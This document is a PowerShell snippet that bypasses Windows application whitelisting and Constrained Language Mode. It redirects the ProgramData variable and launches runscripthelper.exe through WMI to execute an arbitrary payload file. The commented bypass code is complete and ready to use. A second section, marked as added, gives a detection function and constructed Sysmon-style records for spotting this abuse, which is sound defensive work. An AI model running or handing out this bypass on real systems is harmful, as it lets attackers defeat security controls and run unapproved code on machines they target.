Bypass application whitelisting and CLM with runscripthelper and WMI
This snippet aims to bypass application whitelisting by having runscripthelper.exe execute PowerShell code stored in a plain text file, launched through WMI with a modified environment.
The same code also bypasses Constrained Language Mode (CLM).
# Place the PowerShell payload you want executed in C:\Test\Microsoft\Diagnosis\scripts\evil.txt
# (the file name and extension can be anything).
# Build the environment block for the child process: every current variable except ProgramData,
# then ProgramData re-added pointing at C:\Test. runscripthelper.exe expects its script under
# %ProgramData%\Microsoft\Diagnosis\scripts, so the override makes the C:\Test path below acceptable.
[String[]] $AllEnvVarsExceptLockdownPolicy = Get-ChildItem Env:\* -Exclude 'ProgramData' | ForEach-Object { "$($_.Name)=$($_.Value)" }
$AllEnvVarsExceptLockdownPolicy += 'ProgramData=C:\Test'
$StartParams = New-CimInstance -ClassName Win32_ProcessStartup -ClientOnly -Property @{
    EnvironmentVariables = $AllEnvVarsExceptLockdownPolicy
}
# Launch runscripthelper.exe through WMI (Win32_Process.Create) with the modified environment;
# 'surfacecheck' takes the script path and a second directory argument (C:\Test here).
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{
    CommandLine               = 'C:\Windows\System32\runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\evil.txt C:\Test'
    ProcessStartupInformation = $StartParams
}
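A detection-side counterpart, added here as an example and not part of the original snippet: it scans process-creation records for runscripthelper.exe launches whose 'surfacecheck' script path sits outside the real %ProgramData%\Microsoft\Diagnosis\scripts directory, or that were spawned through WMI (parent WmiPrvSE.exe, which is what Win32_Process.Create produces). The field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage), the sample records are constructed, and the expected script root is an assumption passed in as a parameter.

```powershell
# Added defender-side example, not part of the original snippet.
# Scans constructed process-creation records and returns those where runscripthelper.exe
# is asked to run a 'surfacecheck' script from an unexpected location or was launched via WMI.

function Find-RunScriptHelperAbuse {
    param(
        [Parameter(Mandatory)] [hashtable[]] $Records,
        # Assumption: legitimate scripts live under %ProgramData%\Microsoft\Diagnosis\scripts
        [string] $ExpectedScriptRoot = (Join-Path $env:ProgramData 'Microsoft\Diagnosis\scripts')
    )

    # Captures the script path following the 'surfacecheck' verb, tolerating the \\?\ prefix
    $pattern = '(?i)runscripthelper\.exe"?\s+surfacecheck\s+"?(?:\\\\\?\\)?(?<script>[^"\s]+)'

    foreach ($r in $Records) {
        if ([IO.Path]::GetFileName($r.Image) -ine 'runscripthelper.exe') { continue }
        $m = [regex]::Match($r.CommandLine, $pattern)
        if (-not $m.Success) { continue }

        $script  = $m.Groups['script'].Value
        $reasons = @()
        if ($script -notlike "$ExpectedScriptRoot\*") {
            $reasons += "script path '$script' is outside '$ExpectedScriptRoot'"
        }
        if ([IO.Path]::GetFileName($r.ParentImage) -ieq 'WmiPrvSE.exe') {
            $reasons += 'spawned via WMI (parent WmiPrvSE.exe)'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                CommandLine = $r.CommandLine
                ParentImage = $r.ParentImage
                Reasons     = $reasons -join '; '
            }
        }
    }
}

# Constructed sample records: one expected launch and one matching the snippet above.
$sample = @(
    @{
        Image       = 'C:\Windows\System32\runscripthelper.exe'
        CommandLine = 'C:\Windows\System32\runscripthelper.exe surfacecheck \\?\C:\ProgramData\Microsoft\Diagnosis\scripts\check.txt C:\ProgramData'
        ParentImage = 'C:\Windows\System32\svchost.exe'
    },
    @{
        Image       = 'C:\Windows\System32\runscripthelper.exe'
        CommandLine = 'C:\Windows\System32\runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\evil.txt C:\Test'
        ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'
    }
)

# Only the second record is returned, with both reasons listed.
Find-RunScriptHelperAbuse -Records $sample -ExpectedScriptRoot 'C:\ProgramData\Microsoft\Diagnosis\scripts' | Format-List
```

The path check is the stronger of the two signals: the technique depends on redirecting ProgramData so the script can live in a user-writable directory, and that redirection is visible in the command line even when the environment block itself is not logged. The WMI-parent check alone produces noise on hosts where management tooling legitimately uses Win32_Process.Create, so treat it as a corroborating rather than a standalone indicator.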